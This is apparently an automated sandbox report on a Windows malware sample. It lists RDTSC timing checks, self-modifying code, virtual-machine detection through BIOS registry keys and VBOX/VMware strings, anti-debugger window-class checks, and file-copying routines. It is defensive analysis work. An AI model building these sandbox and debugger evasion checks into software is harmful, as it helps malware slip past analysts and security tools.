                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399525 second address: 139952A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139952A second address: 1399545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A68BE4F46h 0x0000000a jmp 00007F2A68BE4F4Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399545 second address: 1399549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451984 second address: 145199F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F57h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145199F second address: 14519B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F2A68BD6A07h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519B5 second address: 14519BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519BB second address: 14519BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451CAF second address: 1451CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451CBF second address: 1451CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145227B second address: 1452285 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451166 second address: 145116C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459807 second address: 1459811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459811 second address: 1459826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F2A68BD69D6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459AFF second address: 1459B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F50h 0x00000007 jmp 00007F2A68BE4F4Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F2A68BE4F46h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F2A68BE4F4Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467A71 second address: 1467A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C08 second address: 1469C19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jnp 00007F2A68BE4F66h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C19 second address: 1469C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C1D second address: 1469C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C23 second address: 1469C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2A68BD69DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B129 second address: 147B13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147AFD3 second address: 147AFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2A68BD69D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1483897 second address: 14838B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838B3 second address: 14838C4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BD69DCh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838C4 second address: 14838D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007F2A68BE4F4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838D4 second address: 14838E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F2A68BD69D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838E1 second address: 14838ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2A68BE4F46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838ED second address: 14838F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838F6 second address: 14838FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14838FA second address: 1483908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F2A68BD69D6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1483908 second address: 148391F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1485FAB second address: 1485FB8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2A68BD69D8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14889A1 second address: 14889AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14889AA second address: 14889AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149002D second address: 1490049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1490049 second address: 1490055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2A68BD69D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1490055 second address: 149006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2A68BE4F53h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149006D second address: 1490089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F2A68BD69E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1493407 second address: 149340D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 149340D second address: 1493411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1493411 second address: 1493422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14990E7 second address: 1499124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A68BD69E8h 0x00000013 jmp 00007F2A68BD69E7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1499124 second address: 1499128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A69B0 second address: 14A69BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A69BA second address: 14A69C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65B3 second address: 14A65B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14A65B7 second address: 14A65BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B3D98 second address: 14B3DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B3DAA second address: 14B3DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B8738 second address: 14B879D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F2A68BD69D6h 0x0000000d jmp 00007F2A68BD69E0h 0x00000012 jmp 00007F2A68BD69E2h 0x00000017 popad 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jnc 00007F2A68BD69EFh 0x00000020 jmp 00007F2A68BD69E1h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B879D second address: 14B87A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B7A86 second address: 14B7A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 jp 00007F2A68BD69D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B7A9E second address: 14B7AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B7BBE second address: 14B7BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCA32 second address: 14BCA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F2A68BE4F48h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F2A68BE4F48h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov dx, cx 0x00000040 push 1386A7F8h 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCA8B second address: 14BCA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCCAF second address: 14BCCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCCB3 second address: 14BCCC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2A68BD69DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCCC7 second address: 14BCCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BCCCB second address: 14BCCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2A68BD69D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14BE161 second address: 14BE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14C007D second address: 14C0086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0310 second address: 54C0320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F4Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0320 second address: 54C0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F2A68BD69E6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2A68BD69DAh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0358 second address: 54C035C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C035C second address: 54C0362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0362 second address: 54C0368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C038E second address: 54C0394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C0394 second address: 54C03E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 pushfd 0x00000006 jmp 00007F2A68BE4F59h 0x0000000b jmp 00007F2A68BE4F4Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F2A68BE4F56h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C03E0 second address: 54C03E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C03E6 second address: 54C042B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2A68BE4F56h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2A68BE4F57h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12119D0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13D0566 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13FB62A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB1160 GetSystemInfo,ExitProcess,0_2_00FB1160
                Source: file.exe, file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1291738753.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1291738753.0000000000E16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13556
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13559
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13571
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13576
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13610
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB45C0 VirtualProtect ?,00000004,00000100,000000000_2_00FB45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9750 mov eax, dword ptr fs:[00000030h]0_2_00FC9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FC78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
